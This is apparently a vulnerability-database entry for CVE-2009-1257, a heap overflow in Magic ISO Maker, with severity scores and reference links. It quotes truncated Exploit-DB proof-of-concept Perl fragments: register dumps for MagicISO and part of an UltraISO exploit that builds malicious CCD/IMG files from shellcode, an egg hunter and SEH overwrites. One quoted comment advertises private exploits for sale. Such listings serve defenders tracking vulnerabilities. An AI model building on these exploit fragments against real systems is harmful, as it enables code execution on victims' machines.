CVE-2009-1257
Published 2009-04-07
Priority P349 · critical · 9 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C
EXPLOIT
EPSS: 13.88% (96.1th percentile)
Heap-based buffer overflow in Magic ISO Maker 5.5 build 0274 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted CCD file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| magic_iso_maker | magic_iso_maker | — | — |
No detection rules found.
Exploit-DB
MagicISO CCD/Cue - Local Heap Overflow (PoC)
exploitdb·2009-04-16
CVE-2009-1257 MagicISO CCD/Cue - Local Heap Overflow (PoC)
---
```perl
#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit PoC
# ----------------------------------------------------------------
# Mountassif Moad
# Stack ..
# Cyber-Zone ..
#
# Private exploits for Kayako, contact me if anyone wants to buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-'
# Register for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Register for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBX overwritten with 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI
```
Exploit-DB
UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow
exploitdb·2009-04-03
CVE-2009-1260 UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow
---
```perl
#!/usr/bin/perl
#
# UltraISO s.img"); #Important: IMG filename must be same as CCD filename.
binmode $img_file;
print $img_file $img_data1.
$overflow1.
$img_data2.
$overflow1.
$img_data3.
$overflow1.
$img_data4;
close $img_file;
open (my $ccd_file, "> s.ccd");
print $ccd_file $ccd_data.
$lookout.$shellcode.$overflow2.$shellhunter.$overflow3.$sehjmp.$sehret.$overflow4;
close $ccd_file;
# milw0rm.com [2009-04-03]
```
No writeups or analysis indexed.
http://osvdb.org/53262
http://secunia.com/advisories/34595
http://www.securityfocus.com/bid/34574
http://www.vupen.com/english/advisories/2009/0940
https://exchange.xforce.ibmcloud.com/vulnerabilities/49673
https://www.exploit-db.com/exploits/8343